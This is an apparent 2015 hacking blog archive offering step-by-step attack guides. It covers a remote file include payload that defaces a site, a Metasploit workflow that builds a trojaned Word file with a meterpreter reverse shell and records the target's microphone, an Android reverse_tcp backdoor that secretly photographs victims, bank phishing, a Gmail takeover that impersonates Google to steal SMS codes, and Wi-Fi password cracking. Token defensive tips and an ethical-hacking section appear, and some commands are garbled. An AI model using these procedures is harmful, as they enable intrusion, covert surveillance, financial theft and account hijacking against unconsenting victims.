Sunday, November 22, 2015

RFI/LFI (Remote/Local File Include)

This is a type of vulnerability that allows a user to include remote or local files, having it parsed and then executed on the server.

To see if a certain website is vulnerable to this issue, try visiting “index.php?
p=http://www.<DOMAIN NAME>.com/”. If the site shows up, then it can be exploited with RFI or LFI. If a different thing appears, then the site is not vulnerable to RFI - this does not necessarily mean it is safe from LFI, however. To verify, go for “index.php? p=/etc/passwd”. This is assuming the server is running on a *nix-based system. If you can view the password file, then the server can be hacked by LFI. If something else appears, then RFI and LFI both won’t work.
If the target is found to be vulnerable to RFI, you can upload a PHP code to their server PHP. Let’s say you create the following under the file hack.php:
<?php
Unlink(“ïndex.php”);
System(“echo GOTCHA > index.php””);
?>

Once you view “index.php?=http://<DOMAIN NAME>.com/hack.php””, then the code will be run on the server. When this is done, the site will change to the simple GOTCHA
message and none will be the wiser.

Friday, November 20, 2015

XSS (Cross-Site Scripting)

If you have been hanging around the Internet as much as you should have (to be a hacker, at least), you would have at least heard of this term. This allows the attacker’s input to be sent to unwary victims.
The primary use is cookie stealing - and no, not the type your sadistic older sibling does. Once the attacker steals yours, they can log into the site the cookie is stolen from using your identity and under the right conditions.

This vulnerability can be determined using the site’s search facility. Try feeding it with some HTML, such as “<font color=green>XSS</font>”. If the word XSS comes up, then the site is vulnerable. Else, you need to find a different way in.

Thursday, November 19, 2015

HACKING A COMPUTER

STEP 1: Like the tampered APK in the Android exploit we did, you will have to find a way to compromise the target system. The common way of doing this is sending an email with a document or a link. Within it is a listener (rootkit) that will allow the hacker to gain access to the computer.

STEP 2: When the document is downloaded and the rootkit, well, rooted, you will need to find a loophole or vulnerability that can be exploited. If you are lucky and the mark does not update his Windows system, then a few things will work such as “MS14-07” that allows the execution of remote codes from Word and Office Web Apps.
Search Metasploit for this vulnerability, and you will find “exploit/windows/fileformat/ms14_017_rtf”. Use it by typing “use exploit/windows/fileformat/ms14_017_rtf”. After loading, find out more about the exploit by typing “info”. Then, “show options”.

STEP 3: This exploit will work only in Office 2010. It can be easy to use, though, as all you need to fill in is the filename. Set it by “set FILENAME <INSERT FILENAME>”.
STEP 4: Set the payload that is needed to work in the file. Type “set PAYLOAD windows/meterpreter/reverse_tcp”. Like earlier, set the LHOST (your system’s IP) so the
payload will know to call your device back. Then, type “exploit”. This will create the tampered Word file.
STEP 5: Open up a Multi-Handler for the connection back. Simply type “use exploit/multi/handler” and “set PAYLOAD windows/meterpreter/reverse_tcp”. Finally, set
the LHOST to be your IP.
STEP 6: Send the infected file to the mark. If you don’t have a clue how to do this, try Googling “email”.
STEP 7: As soon as the file is opened, a meterpreter session will be active. Now comes the juicy part - on the meterpreter prompt, try running “run sound_recorder - l /root”. This will turn on the mark’s microphone and send all recorded conversations in a file and send it to your /root directory. Easy peasy! And since you are using meterpreter, you can do pretty much anything except start a fire with the keyboard. Lots of meterpreter commands are available that will give you all sorts of data - yes, all the way down to keystrokes. Again, now that you know how it is done, it should be a piece of cake to not fall victim. Always update your OS installation to take advantage of the latest security patches, and be careful of the things you download and open. If you are a Windows user, anti-virus software with rootkit detection ability can go a long way.

Wednesday, November 18, 2015

ICMP

This stands for Internet Control Message Protocol, the most used in networking. This is a connectionless protocol, meaning it will not use any port number. It is usually meant for diagnostic purposes, server querying, or error reporting. As a hacker, knowledge about this is important because you will be using ICMP a lot to end payloads. Pinging, for example, uses ICMP - and this, just like any ICMP message, has inherent security holes.

In ICMP, for example, an error message is not sent in response to an error. When the error is sent, it will send the IP header and datagram, which details the error’s cause. This will cause the receiver to associate the error with the specific process. This means that when the Type 0 (echo reply) has been sent, the reply will not be a Type 8 (echo request), though a Type 8 will always elicit a Type 0.
This is taken advantage of by the “Smurf Attack”, which is nowhere near as cute as it sounds. In this technique, the attacker will spoof the ICMP packet’s source address, sending a broadcast to all computers in the network. If this traffic is not filtered, then the victim’s network will be congested, dropping its productivity. Aside from using this to Smurf the network, it can also be used to gather information by discovering all hosts on the network.

TCP

This stands for Transfer Control Protocol, a fixed communication protocol that is a bit more complicated and more reliable than UDP. It works with IP (Internet Protocol) in doing its job - TCP takes care of the internal communication between the application and network software, while IP takes care of communication from another computer.

Since TCP and UDP are very much alike even in terms of hacking potential, check out the next item for a great hack idea.

Tuesday, November 17, 2015

Online Banking Hacking

After you learned about different types of hacking, there is a last one to take in consideration and that type of hacking is called Internet Banking Hacking and it’s considered a cyber crime in the most countries of the world.

In the last years, internet banking has become a feature used by a big number of people and it has its advantages, but the main disadvantage is that once hackers get into this type of hacking all the money are lost. Authorities and expert analyses estimate that in the future years the cases of online banking hacking will take a considerable growth. Online banking exists since 1980 and new methods to hack
online bank accounts are appearing everyday.

The first method you can choose for hacking an online bank account is phishing, the number of this kind of attacks are growing in the last years against banking systems, to hack the victim you should use social engineering techniques as well.

Hackers hide under a bank identity and make their new identity look as real as possible pretending to belong to the bank, malicious emails, advertisements and emails are the top secret in getting into someone’s bank account without their permission or knowledge. You should adopt the typical phishing scheme and try to collect as much information as you can about your victim, before anything else you should know their email address and if the victim uses this address for online banking but don’t worry, most of the people do it because it’s a little bit too complicated to work on
couple emails at a time and people who choose internet banking are usually busy and they don’t have time to follow more than an email address.

So, after you have got the email address, send any email that can get your victim’s attention by opening that email, the content of the email can be something interesting or in this case it’s better to guide your victim though a link to a specialized website that will ask for financial data and security details, those kind of websites are specially designed to look like an official bank account, but is
definitely not the original one, those infected websites are designed identical to the original ones.
Your email should make the victim click on a link which will guide your victim to a website which perfectly replicates a bank site.

Hackers also include in the email attachments which contain the link to the fake website and once opened it has the same effect. Phishing emails should take the official form of notifications and emails of the banks, organizations or e-payment systems, those kinds of messages request your victim’s sensitive information that will help you reach your goal. Malware specially designed for online banking hacking exist! it’s named Prg Banking Trojan.

McAfee has published a report on phishing which indicates that hackers aren’t hacking small banks, their targets are big companies, banks and organization that could worth the hack operation to be done. 37% of all banks on the globe were hacked using the phishing method in the last 12 moths at least once.

Hackers attempt to every sector by phishing it. Hackers are interested in predominantly banking, e-payment systems, e-auctions and generally in hacking big financial organizations around the globe.
Phishers are focused on breaking into hosting providers and they succeed in most of the cases, hackers disgracing servers and update their own configuration in order to display phishing pages from a private subdirectory of each domain that the machine host.

Don’t forget to protect yourself even if you are trying to hack online accounts, with a little lack of attention you can loose everything as well as your victims. Don’t divulge your Internet Protocol, read carefully every email and don’t click unless you are sure, ask and request more information always in order to keep protected.

The second method used by hackers to break into online banking accounts is called Watering Hole and specialists define it as an evolution of phishing attacks. By choosing this option hackers are injecting malicious codes onto a public website visited by a small and standard group of people.
In Watering Hole attack, hackers wait for target people to visit the hacked website and they are not inviting their victims to do it, they are only waiting for them to visit the website. If you choose this method, you should use Internet Explorer and Adobe Flash Player.

Hackers are compromising websites using this method that aren’t updated and configured very frequent because they are easily to hack than an updated website, usually hackers are using the exploit kits they find on the black square. Pro hackers hack the website at least six months before they attack it. This method is very efficient because hackers and websites can be located very
hard comparatively to phishing attacks. After the attacks hackers keep in touch with the website to make sure that everything is going in the direction they want to.

In 2012-2014, hackers used this method to hack a regional bank in Massachusetts. The operation was successful due to the JavaScript elements on both sites, the bank in Massachusetts and the local government that was under Washington DC suburbs:

Hxxp://www.xxxxxxxxtrust.com
Hxxp://xxxxxxcountrymd.gov

Another attack using this method was discovered in March 2013 when many banks in South Korea were compromised, the hackers collected sensitive data from the bank and they have also shut down their system. An interruption of their services was made on their online banking. Hackers consider this method a solution for the problems that authorities and security services and systems give them, and because they love to solve problems, they found an innovative solution in this case as well.
Researches show that most of the hackers make money online using this method and a lot of them are still undetected.

Hackers have a lot of ideas and they are really good, their ideas reflect in their solutions and that’s how Pharming and Credit Card Redirection hack method was born.

This method consists in hijacking a bank’s URL and when the customers access it they are automatically guided to another site which is identical to the original website. This method of hacking is a little bit more difficult than the other two methods, but not impossible. You can technically make it with one of the next techniques:

1. DNS Cache Poisoning
DNS’s exist in a bank’s, organization’s or company’s network to make a better response performance. Hackers attack the DNS server by exploring vulnerabilities in the DNS software, which make the server to give an error because it will incorrectly validate the DNS response. The server will redirect people to another site because it will catch wrong all the entries. Usually, the server which will host the victims is managed and controlled by hackers in order to give the customers malware. Hackers can even attack customers if they provide the hackers their IP.

2. Hosts File Modification
Hosts file is used by hackers to direct the customers on any website under their control.

A new technique is Credit card redirection which is used on disgraceful ecommerce websites to let the hackers get the sensitive information they need. This technique is not hacking the customer directly, after the victim pays using the card, the hacker modify the flow of the operation and all the money are redirected to them and most of the attacks are made on websites that offer e-commerce
services.

Hackers also break into a victim’s account by changing the credit card processing file.

Another type of attacks used in online banking hacking is called Malware based attacks and they are classified as the most dangerous attacks on the internet related to online banking services.

There are many malicious categories but in general they are designed to hit the online financial business. Security community considers Zeus, Carberp and Spyeye are considered the most dangerous of all. Zeus is in fact a Trojan horse which best works on all the versions of Windows, it was first discovered in 2007 when hackers use it to obtain illegally information about US Department of Transportation, it’s the oldest one from those three and even NASA got hacked in 2009 using Zeus.

MIITB is maybe the most efficient method used by hackers in internet banking where the ones who want to attack combine social engineering with malware which is infecting the browser of the victim. It mostly hide under the form of BHO (Browser Helper Object), attacks are based on proxies which infect the browser of the customer exploring it’s weakness on the victim’s device. Malicious codes are able to change the content of an online transaction between the bank and the customer.
The Zeus Trojan is also used to hack and get bank credentials by MIIT keystroke logging. Specialists consider that nine million phishing emails with Zeus were sent in 2009. According to ZeusTracker USA, Deutschland, Russia, UK, Ukraine, Romania, Netherlands, France, Japan and Turkey are top ten countries which are hosting Zeus. HoT- Hand on Thief is another Trojan specially designed to hack online banking, it was created to hit the Linux and Mac systems which demonstrated to be
immune to malware. Authorities say that it was created in Russia and it’s available to buy on some Russian underground forums, it’s capable of infecting the victims and stealing sensitive information from their machines. Grabbers and backdoor infection vectors are currently on sale with Hand of Thief for approximately $3000.

DDoS attacks are also used to hack internet banking. In case of online banking hacking, hackers are helped by volunteers that participate in the operation, a botnet is easier to detect and volunteers can block the whole process of detecting.

After 129 countries have been attacked with DDoS attacks, FBI decides to share a list of more than 130.000 Internet Protocol addresses used in attacks, attacks where the victims could not access their online or mobile banking services.

The fundamental types of DDoS attacks:

The ones based on volume VBA- the hacker is making an inundation with big quantity of data on the site. Protocol Attacks PA- when the hackers are trying to imbue the target servers by exploiting network protocol failures. Layer Seven Attacks- created to exhaust the resource limits when hackers make inundations with huge amounts of HTTP requests that saturate a target’s resources. DDoS attacks are also used as a deflection to hide the results of an attack that is ongoing. Dirt Jumper is a part of DDoS malware group and it has an updated version called Pandora, a big number of DDoS kits have shown up like YZF, ArmageddoN and DiWar. FBI and FS-ISAC and IC3 are highlighting the distribution of Dirt Jumper kit being used in bank attacks.

Using the methods from above, hackers can get money and they are also called criminal cyber if they do this activity illegally, they can hack an ultimate number of account and banks until they are discovered, if they are ever discovered. Now more than ever, hackers don’t focus only on computers, they also take in consideration hacking the mobile phones which are today such an result of great
ideas combined with hard work, since the phones are smart phones they allow you to do any kind of operation you want or need and they are way more used nowadays than computers, a lot of people use their smart phone to pay bills online or to do transactions online via internet banking services all around the world and that’s why hackers are focusing also on smart phones and hacking their systems in order to reach a new goal or just to give themselves new challenges. A research done in 2015 highlights the importance of smart phones and shows us that smart phones are more used nowadays then computers.

Email Hacking for Beginners and not

The fourth type of hacking is email hacking and in this type hackers attempt to an email address without permission. The electronic mail is more used than the traditional mail boxes and that’s due to the evolution, emails are used today mostly as a form of communication due to its options. There are two types of services web-based: an email service which is open-based and that means this type
deliver email accounts to any customer, some of them are for free but some request fees and the other type give email accounts controlled and organized by companies for employees, and in general students and members only. There are three big forms of attacks: spam, virus or phishing.

The first type of attack is realized by delivering huge email broadcasts which contains a hidden IP address or email addresses, a spam message usually contains something very attractive such as low-priced travel tickets, job offers and in general any kind of offers and to be more attractive spammers use a lot of colors and photos. Some of the hack victims may open the magic message, read it and get
really interested in its content.

The big fun for hackers is when they hit a big company and hold their sending email and IP address. If the masters of email hacking choose a company and hack it the company would be destroyed and their internet connection would be down and stopped by its Internet Service Provider (ISP) and none of their emails would reach the destinations.

Another method used by hackers to get unauthorized access into someone’s email is by sending them an email that hides a virus in the background, the Sobig virus is often used because it’s a modern technology that creates a spamming infrastructure because it’s taking over unwilling PC members. The third way hackers follow to hack and email is called phishing and it consist of collecting
sensible and valuable information from others emails such as credit card numbers, user names and passwords and many hackers use this method to get money. The risk of being hacked by phishing is very high in those days especially on Facebook and Twitter where you give some precious information about your person, social media is not as kind as it seems and there are a lot of well hidden secrets behind them.

There are three types of phishing, the first type is known as Spear Phishing and it’s used to attack target people, companies and organizations, 91% of email attacks are made with this kind of phishing and most of them are successful. The next phishing type is called Clone Phishing and its adepts clone emails by creating identical ones and the last type of phishing is known as Whaling, people use this
term to describe a high profile attack made using phishing method.

An interesting way to hack someone’s account you can apply only by knowing his/her phone number, let me explain how, when a person is making a new email address its recommended to attach their phone number for security reasons and in case you forget your email password you can set a new one if you add your phone number, so most of the people add their phone numbers. It’s enough to know your victim’s phone number and email address to start.

First, go to the login page and type the email where they ask you to do it and after that select the ‘’need help?’’ option and select “Get a verification code on my phone: [mobile phone number]” and the sms will be sent to the phone number, the sms usually is formed from six letters. After that, you should send a message to the person’s number pretending you are Google and the message should be
“Google has detected unusual activity on your account. Please respond with the code sent to your mobile device to stop unauthorized activity.” the victim Will believe this message and send you the verification code which you will enter lately. After entering the code set up a new password and we are done, check everything you want on that account.

*Note: this method works only with Gmail accounts and it will be successful if the victim doesn’t know your number, in case the number is known by the victim try to send the message from an unknown number.

Every one of us must take measures immediately to protect our email addresses, a big company like Yahoo!, Gmail or Hotmail treat their customers with curiosity by offering them high security, each one of them will notify you immediately if there is something strange and ask you to check your email or set up your password. Another good idea is to make a complicated email address with numbers but make sure you don’t forget it! Also you should choose a complex password with numbers and big and small letters (I recommend creating a password with more than 12 characters). Your computer should be protected as well, make sure you get a professional, original and high quality antivirus software like Avira or Avast, they might offer you a short testing period and after that they will ask you to buy it, do it, it totally worth! Even a hacker should protect his computer because you never know what could happen in the next second.

Choosing a difficult security question will increase your security rate but be careful; you should remember the answer even after ten years or more if it’s needed, this option could save your email’s life because no one will be able to surf the internet in hope to find something very personal about you. However, email hackers have a lot of success those days by simply getting into more and more email accounts...

Network Hacking

Despite the hackers, there are “occasional” hackers who are using the network hacking to crack wireless passwords because internet connections are a necessity in our lives but how is a wireless network secured? In case of secured wireless connections, encrypted packets represent internet data under another form.

Packets are encrypted with network security keys and basically if you want to have access to internet wireless connection then you should have the security key for that particular wireless connection. There are two types of encryptions in use WEP (Wired Equivalent Privacy) and WPA (Wi-Fi Protected Access), WEP is the fundamental encryption and a very small number of people use it because it’s very unsafe and it can be cracked very easy. WPA is the more secure option, WPA-2 is
the most secure encryption of all time and you can crack a Wi-Fi Protected Access network then you will need a wordlist with common passwords but it can be unbreakable if the administrator is using a complex password and because a lot of people are interested in breaking Wi-Fi protected connections, this book is going to show you how to do it. You will need a compatible wireless adapter, CommView for Wi-Fi, Aircrack-ng GUI and a big bag full of patience. This operation is
impossible without a compatible wireless adapter, your wireless card must be compatible with the software CommView, software used for capturing the packets from the network adapter, and you can download the software from their website.

Aircrack-ng GUI is practically doing the crack after capturing the packets. Don’t forget two main things before starting: select the network with the highest signal and remember that every network has its details in the right column, not in the left column. Set up CommView and choose your target network, select it and double click on “capture” with CommView and the software will start collecting  packets from the selected channel. If you want to capture packets only from the target network then right click on the target network and copy the MAC address, on the top change to Rules tab, on the left pick MAC addresses and enable them. Once you have done this, select the option capture and for ‘add record’ please select both and paste the copied addresses in the displayed box. Enable auto saving in the logging tab, set MDS (Maximum Directory Size) to 2000 and ALFS
(Average Log File Size) to 20. And you are at the point where you should use your patience and wait until at least 100,000 packets are captured and export them by going in the log tab and selecting concatenate logs and select everything that has been saved and don’t forget to keep CommView open, take a walk to the folder where you have saved the concatenated logs and open it and click on File- Export - Wire shark tcpdump format and chose any destination, after doing this logs will
be saved with .cap extension. Next, open Aircrack-ng and there you will find a zip file, extract it and open it and navigate to ‘bin’, now run the software and choose WEP. Remember the file you saved earlier .cap? Click ‘launch’ and in the command prompt write the parameter number of your desired network and wait for a few seconds. Enjoy the internet now!

Best Hackers of All Time

Despite the rich and diverse culture, as any other domain, hacking owns a top of hackers who made the biggest hacks in the world, and it’s hard to be on top
because there are millions of hackers but only the best skilled of them succeed, the rest are just a part of people used to make the successful hackers shine even more. In fact, being successful is not even a goal; successful people are people who do everything with passion and hard work no matter how hard the situation is and success is a collateral effect you get, not a goal.
Gary McKinnon was born on 10 February 1966 in Glasgow, Scotland, he has always been curious and passionate about computers and informatics, which is totally great if you follow your dream in this domain of science. Gray is living right now in London and he is known as a hacker for the operation he did in 2002 called “biggest military computer hack of all time” when he used to put down the US Military’s Washington Network of about 2000 computers for 24 hours and that’s how he received the title of “The biggest hacker of all time”, his curiosity strongly made him to break into NASA’s computers just to get information on UFOs, he wanted to make sure that he is getting it right from the source. He illegally accessed 97 US Military and NASA computers by deleting a couple of files and installing a virus. Everything he made was just to satisfy his curiosity. The whole hack was from his girlfriend’s aunt’s house in London using the name “Solo”. More than that, after hacking he posted a message on the US Military’s website saying “Your security is crap.” And continued hacking but at the end he admitted that he left a threat on one computer after another hack saying “US foreign policy is akin to Government-sponsored terrorism these days … It was not
a mistake that there was a huge security stand down on September 11 last year … I am SOLO. I will continue to disrupt at the highest levels .
Right now, Gray is happy with his title and by following his dream he is more than pleased working as a system administrator, a great example of a man who is happy because he followed his dreams. LulzSec or Lulz Security is an important group of hackers due to their realizations, they are a group with eleven members and seven volunteers and they are doing high profile attacks.
Their motto is “The world’s leaders in high-quality entertainment at your expense”, “Laughing at your security since 2011” and their main goal is showing the gigantic companies their lack of security and absence of taking care of their personal data. They hacked Sony, News International, CIA, FBI, Scotland Yard, and several noteworthy accounts to show them how they can play with other people’s information. By hacking, they were having lots of fun and a demonstrative attack is when they broke into News Corporations account posting a report about the death of Rupert Murdoch on 18 July 2011 which was totally fake.
Also, they have created an ASCII graphic used by them in its Chinga La Migra torrent, here’s how the graphic looks like:

. /$$ /$$/$$$$$$
.| $$ | $$ /$$__ $$
.| $$ /$$/$$| $$ /$$$$$$$$| $$ \__/ /$$$$$$/$$$$$$$
.| $$| $$ | $$| $$|____ /$$/| $$$$$$ /$$__ $$ /$$_____/
.| $$| $$ | $$| $$/$$$$/ \____ $$| $$$$$$$$| $$
.| $$| $$ | $$| $$ /$$__//$$ \ $$| $$_____/| $$
.| $$$$$$$$| $$$$$$/| $$ /$$$$$$$$| $$$$$$/| $$$$$$$| $$$$$$.$
.|________/ \______/ |__/|________/ \______/ \_______/ \_______/
//Laughing at your security since 2011!

Another important figure in hacking world is represented by Adrian Lamo; he was born on February 20, 1981 in Boston, Massachusetts and he is mixed race (Colombian-American)he is known as a former hacker and threat analyst. Lamo doesn’t own a high school diploma and he was often called “Homeless Hacker” because he loved to surf, travel, explore abandoned buildings and go to the internet cafes, libraries and universities to discover network and look after details, exploiting security holes was always a hobby for him.

Lamo first got media attention when he decided to change careers and realized his skills in hacking. He hacked big companies such as Yahoo!, Microsoft, Google, and The New York Times and in two thousand and three he’s got his first arrest. In the prison, he studied and after getting free he’s got a batch of an American Threat Analyst which allows him to break into accounts sitting is spacious places such as cafeterias. Lamo is one of the biggest examples showing us that school is not
learning you everything and the main problem of school nowadays is the big amount of information school is giving to the students in different domains in order to let students choose a domain they love and specialize only on it. Number four in this top is taken by Mathew Bevan and Richard Pryce, two hackers which case is similar to Gray’s case. Mathew Bevan was born in June 10, 1974 and he is a British Hacker born in Cardiff, Wales he’s got his first sentence and arrest in 1996 after breaking into secure U.S government network protecting himself with the nick name “Kuji”, Mathew wasn’t very good at school and he used the internet to escape form the real life, in this way he formed a double life, the first one with ordinary activities at day and the second life with night activities based on computers and networking. Mathew Bevan and Richard Pryce created many damages between United States of America and North Korea as they used to hack the Military Us computers and installing on them foreign and strange systems. The contents of Korean Atomic Research Institute were dumped into USAF system.

Jonathan Joseph James (December 12, 1983 – May 18, 2008) is an American hacker from North Florida and he is the first juvenile in prison due to a cybercrime he did at age of 15. His action name is “c0mrade” and he broke into Defense Threat Reduction Agency of US department and he installed software that controlled the messages passed on though conversations between the employees of DTRA and he also collected the user names and passwords and other details of employees. More than that, he stole important software. NASA paid from its wallet 41,000$ to shut down its system. Jonathan ended his life committing suicide in 2008. Number six is Kevin Poulsen and his hack story is the funniest so far. Kevin Lee Poulsen (born November 30, 1965) was born in Pasadena, California and he is a black hat hacker because he used his skills to get one of his interests true, he is currently working as a digital security journalist. Would you do anything to follow your dreams? In his case the answer is yes, so from dream to practice was only a step and he made this step by hacking a radio show powered by Los Angeles radio station KIIS-FM, the game rules were so simple, the 102nd caller will win a prize of a Porsche 944 S2 and Kevin wanted to make sure that he will be the lucky caller so he hacked into their phone line. Known as “Dark Dante” he went underground when FBI started to follow him but he was caught and arrested with a sentence of five years. And no one knows what happened with the car. Kevin David Mitnick was born on 6 August, 1963 in Los Angeles, California, he was called once as ‘’the most wanted cyber-criminal of US, but time and work transformed him into a successful entrepreneur. Kevin is also an important hacker; he broke into Nokia, Motorola and Pentagon. He’s got media attention when he was arrested in 1999 and 1988, he had two hack names “The Condor, The Darkside Hacker” and after spending five years at the prison he opened a security company named Mitnick Security Consulting. At the age of 15 he showed his interest to social engineering and he started to collect information including user name, passwords and phone numbers.

Nowadays, he is working as a computer security consultant but in the past he used to work as a receptionist for Stephen S. Wise Temple.

Number eight is taken by Anonymous, one of the most popular moves from the last years, the group was born in 2004 on the website 4chan, it’s more an ideology and it represents a concept in which few communities of users exist in an anarchic society and they are fighting for internet freedom against big corporations. The members are wearing Guy Fawkes masks and they are attacking religious and corporate  websites in special. They have targets such as The Vatican, the FBI, and
the CIA, PayPal, Sony, Mastercard, Visa, Chinese, Israeli, Tunisian, and Ugandangovernments which they almost touch. Many of the members wish to control the Virtual World someday. Astra is the cover of a Greek mathematician who is 58 years old and it’s well known due to the damage Astra caused to the French Dassault Group in 2008. Astra hacked into their system and stole weapons technology data and for five years Astra sold the data to five countries around the world. Official sources say that he had been wanted since 2002. Astra’s happiness meant Dassault sadness because the damage caused to Dassault was about $360 millions while Astra was selling data to more than 250 people all around the world. And the last place in this top is taken by Albert Gonzalez, an American computer hacker; I’d call him The Master Hacker of internet banking because he stole more than 170 million credit cards and ATM numbers in the period 2005-2007. He is originally born in Cuba in 1981 but he immigrated to the USA in 70’s and he’s got his first computer at age of 8. After many attacks he’s got arrested on May 7, 2008 and got a sentence of 20 years in Federal prison.

HACKING DO’S PLANS

1. Set your goals. Know exactly what you are setting out to find - it makes little sense to start hacking blindly. You should know whether you want to see what an intruder sees on the target points of access, what he can do with that information, what the victim sees when a hack occurs, etc.

2. Plan the work. Another caution against being haphazard. Make sure that the testing process and interval is specified, and the networks you need to test clearly identified. Hacking can easily lead you astray, sidetracked with a curious loophole or problem you would want to solve - but ultimately does not lead to the objective.

3. Keep a record. You would want to know how you got there, especially if you have to brute-force your way through a very tough shell of security. At the very least, this can help you in future jobs. Record everything that happens, whether or not your hack was successful. And remember to keep a duplicate of your jobs.

4. Do no harm. Remember when Dennis Nedry hacked the power supply in Jurassic Park? It wasn’t a pretty sight for him or for the rest of the park personnel. Remember to
always think twice about every exploit, considering if what you do can cause any widespread damage.

5. Use a Scientific process. This means you set goals that are quantifiable, tests that are repeatable and consistent, as well as tests that are novel - those that can impact in the long run.

6. Stick with your tools. As a new hacker, you will see several dozen different tools available for different jobs. The temptation to download each one is great. However, these tools are sometimes used differently and can spoil your hacking methodology. Once you find one that suits your style, it is best to stick to it.

7. Draw up reports. Your logs are not reports - they are for reference. Instead, create a more concise and legible report or at least a progress update, that will summarize all the important points of your stint, as well as a recommendation of how to improve the target system.

SQL Injection

This is simply the act of injecting your own, home-brewed SQL commands into an existing web-script, allowing you to manipulate the database however you wish. There are different ways to use SQL injection:

Bypassing log-in verification
Adding a new Admin account
Lifting passwords
Lifting credit card information
Accessing any and every part of the database

Of course, these will only work if the SQL used in the website is vulnerable. An example is a log in script that simply takes the username and password input (without filtering it) and compares it with the user’s value from its database in order to check the input’s validity. This might seem like a really simple-minded way of authenticating log in credentials, but real programmers use it in real-world scenarios. Don’t ask us why.

STEP BY STEP GUIDE HACKING WiFi PASSWORDS

STEP 1: Open the Terminal and execute “airmon-ng”. This is a bash script that lets you turn your wireless card into monitor mode. The screen will list the wireless card/s attached to the system.

STEP 2: Stop the wireless monitor mode by executing “airmon-ng stop wlan0”

STEP 3: To start capturing the wireless traffic (including that pesky protected WiFi), run “airodump-ng wlan0”. The screen will then show the captured data.

STEP 4: From the list of captured traffic, find the access point with the WPA2 security and take note of the AP channel number. Run “was -i wlan0 -c <CHANNEL NUMBER>
-C -s” to know whether the WPS locked status is enabled or not. If the locked status says “no”, then we can move to the last step.

STEP 5: Here, we will brute-force the password through Reaver. This is a program available through Kali Linux, but you can download it separately if you have a different system. Type “reaver -i <YOUR INTERFACE> -b <VICTIM’S BSSID (MAC ADDRESS)> - fail-wait=360”. This can take some time. Cracking a 19-character password using Kali Linux running within a VirtualBox can take up to five hours. Of course, a faster hardware and better wireless card can shorten the wait time. Again, as a hacker, you need to know how to stop this from happening to you. Note that WPA and WPA2 passwords that do not have the WPS system turned on are not affected by this.
By know you should realize the importance of maintaining high quality passwords for EVERYTHING you use on you computer, phone or anything. One of the best and FREE
password security software services out there is call LastPass. I highly recommend using them right now! Especially, if you currently use only one or two simple passwords for all your logins. They also have a nifty mobile app, which links everything together (for $12/yr – very cheap for what it is offering you, all considered).

HACKING WiFi PASSWORDS

We would be completely remiss if we discuss hacking and not even think about getting past that stubborn WiFi password your neighbor keeps (we could also be joking). But in case you would ever need to get past a WPA2 password in your white hat activities, then we’ll tell you the basics.
There is a flaw in the WPS (WiFi Protected Setup) system that allows WPA and WPA2 passwords to be broken in different situations. Ironic, right? The thing is, WPS setup is enabled by default in many access points even after the access point is reset.
What you will need For this activity, you would need a wireless card that supports promiscuous mode. This is easy to come by on online stores. You would also need a target, an access point with both WPS and WPA2 security enabled. For the tutorial, we will be using the same Kali Linux system mentioned in the previous chapter.

STEP BY STEP

STEP BY STEP GUIDE ANDROID PHONE HACKING

STEP 1: Pull up your Linux terminal and use the Metasploit payload framework:
Msfpayload android/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=
<PORT TO RECEIVE CONNECTION>
Execute the command.

STEP 2: The payload we used here is reverse_tcp - with this, the attacker will expect the victim to connect to the attacking machine. The attacker will then need to set up the handler to work with incoming connections to the specified port. Type the msfconsole command and go to the software’s console.

On the line that says “msf exploit (handler) >”, type “set lhost <ATTACKER_IP>”, and then “set lport <PORT TO RECEIVE CONNECTION>”. Then, type “exploit” to begin
listening to incoming communication.

The Metasploit framework will notify you once the reverse handler has started, and once the Meterpreter session has opened. This would mean that you can now do everything with the victim’s phone! Try typing “webcam_list” and then “webcam_snap 1” or “webcam_snap 2” for starters. This snaps a pic from the phone’s front or back camera - all done remotely and in secrecy, and sent to you!
Of course, all this would be done assuming that the victims download the tampered app. As a hacker-in-training, you should know better than installing apps from unauthorized sources unless you can read the APK’s source codes. The hack we had featured here is pretty easy compared to what highly accomplished hacker-programmers can do - things like creating a 3D map of your home or office through randomly taken snapshots. Yes, much like Dark Knight or Iron Man 3. Look up the US military’s PlaceRaider app to see what we mean.

http://howtohacksmarter.blogspot.si/2015/11/getting-started-hacking-android-smart.html

GETTING STARTED – HACKING ANDROID SMART PHONES

All you will need is a simple computer connected to the Internet, equipped with a free penetration-testing system called Metasploit. This can run in either Windows or Linux, but for this tutorial we will use a Linux variant geared especially for penetration - Kali Linux.
Then, of course, you will need a target Android smartphone. Before starting, you will need to know the IP Address of the attacking device (i.e., your computer), as well as its connection receiving port.
As a prerequisite, you need to be able to create a tampered APK that has the attacker’s IP and receiving port in the source code’s const-strings. If you can, this is best done with an app that activates on the phone’s startup, so you can have a persistent backdoor.

STEP BY STEP

UDP

This stands for User Datagram Protocol, a connectionless and usually unreliable (no packet sequencing, no resending of missing or bad packets) protocol that relies on IP in pretty much the way that its more famous sibling TCP does. It has a fairly simple algorithm - simply send a UDP packet and wait for a response. If the response is ICMP, the port is closed. If UDP, it is open.

Hacks using the UDP are almost always inextricably linked with the other two protocols discussed here. One of the most common UDP-based attacks is the UDP flood, which, like the Smurf Attack can cause Denial of Service to the victim. While not as straightforward as a TCP DoS attack, the UDP flood is fairly simple to execute. Simply scan the open networks using Nmap, and send a huge number of UDP packets towards the random open ports. This will cause the distant host to check for applications listening at the port, try to shut out those apps, and reply with an ICMP unreachable packet. This will ultimately cause the service to be unreachable by any other clients.

WHITE HATS HACKING

One question that comes to mind is: what makes hacking “ethical”? After all, by its very definition, a hack is something that exploits and takes advantage of  vulnerabilities for a specific gain. There are cases when hacking is justified though, such as the following:

1. Express consent (almost always through a contract) is given by the company that allows you to probe their network. This will allow you to identify the potential
risks in their security.

2. You will not harm the company’s assets in the process (exceptions may apply).

3. When the work is completed, it should be closed out so no one can exploit it
afterwards.

4. Any vulnerability you find should be reported to the company.

Doing these will separate the white hats from malicious or “black-hat” hackers. Despite the shady characteristics of the job, white hats have helped corporations make leaps and bounds in protecting the information we entrust to them in our daily transactions. Being a white hat hacker is essentially like someone asking you to play the bad guy. These companies have built up a wall around their vital systems, and they want to see just how strong that wall is against a real-life threat (you). This way, you have to have all the abilities of a real hacker without all the bad intent.
But wait… There’s more!
But it doesn’t end with good intentions - you need to have proof of that, or how will anyone trust you?
To get that proof, you need to be a Certified Ethical Hacker or CEH. This is a qualification that can be obtained in the assessment of security systems through  penetration testing processes. One will take an exam (formally labeled “312-50”), which gets updated every now and then.
